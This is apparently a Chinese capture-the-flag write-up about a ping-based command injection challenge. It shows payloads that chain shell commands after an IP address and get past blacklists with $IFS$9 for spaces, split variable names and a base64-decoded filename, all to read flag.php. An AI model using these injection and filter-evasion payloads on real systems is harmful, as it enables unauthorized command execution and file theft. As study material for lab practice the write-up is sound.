非常简单的页面

看题目 猜到可能是用命令执行 比如 ping 127.0.0.1;ls

不会这么简单吧 不会吧 不会吧

操
怀疑是被脚本 控制了 不让用cat
fuzz 手动测 惨

把flag.php 过滤了
空格 也过滤 了
{} 也过滤了
只好拼接
%都过滤 是人么


有可能是 黑名单
构造 a=c;b=at;c=fl;d=ag;$a$b$IFS$9$c$d.php

说明服务端用了正则过滤 flag
只能编码解码绕过了
因为空格只放了 $IFS$9 难受
构造 cat$IFS$9`echo$IFS$9"ZmxhZy5waHA="|base64$IFS$9-d`

双引号过滤 了 单引号也是 离谱
`也过滤了 结束了
之前 想盲打 忘记搞index.php了 它没做什么过滤

和之前祥云杯的好像啊
主要是 他把""都过滤了
e...看了看wp 还是拼接 不过是换了下顺序绕过 匹配到的flag
之前看过好像 忘了
构造 127.0.0.1;a=g.php;b=fla;cat$IFS$9$b$a

还以为失败了 结果

感觉之前 我好像也找到了 白页 应该是假的 `过滤了
再试试
1;cat$IFS$9`echo$IFS$9ZmxhZy5waHA=|base64$IFS$9-d`
可以过 操

刚才做出来了 显示个白页 以为错了 跑去看wp 难受 不过没关系 啊 不看wp 我可能还想不起来 打乱顺序绕preg正则匹配
多积累方法总是好的

想到过 直接用 cat 打开所有文件 但是 不知道语法 可惜
试试

$IFS$x x为任何数字好像都行


前 2个应该都行 第三个因为过滤了 双引号 失效
over